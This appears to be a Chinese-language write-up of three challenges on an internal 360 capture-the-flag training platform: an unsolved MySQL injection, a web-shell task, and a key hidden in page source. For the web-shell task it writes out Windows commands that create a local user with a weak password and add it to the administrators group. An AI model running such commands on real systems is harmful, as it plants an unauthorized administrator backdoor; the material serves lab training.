360CTF 实训平台:http://172.18.25.55
仅限内网访问
# 360-SecLab-Web-01
# 菜刀的相册
# 题目描述
进入题目页面,发现与上面 MySQL 一样,同样是通过 $_GET [id] 传参
题目网址:http://10.2.0.18/7/
# Write-up
MySQL 注入,暂时没有成功,各位可以自行尝试一下
# 这是黑阔们经常干的事
# 题目描述
本题考察的是 windows 下 cmd 相关命令的使用。
题目网址:http://10.2.0.18/8/index.asp
# Write-up
这是菜刀大牛的服务器的 cmdshell,而且还是 system 权限,不信你可以输入 whoami 试试
据调查,他服务器的系统是 Windows 系统,请你添加一个管理员用户!
# 添加管理员账户 lalala,密码 123456 | |
net user lalala 123456 /add | |
# 将用户 lalala 提升为管理员用户 | |
net localgroup administrators lalala /add |
用刚创建的账号密码登录 http://10.2.0.18/8/check.asp,获取 key
# 老规矩,你懂的
# 题目描述
简单的 web 代码隐藏 key 的题目。
题目网址:http://10.2.0.3/14/
# Write-up
浏览器打开题目地址,按 F12 查看源码,这不就是吗。。。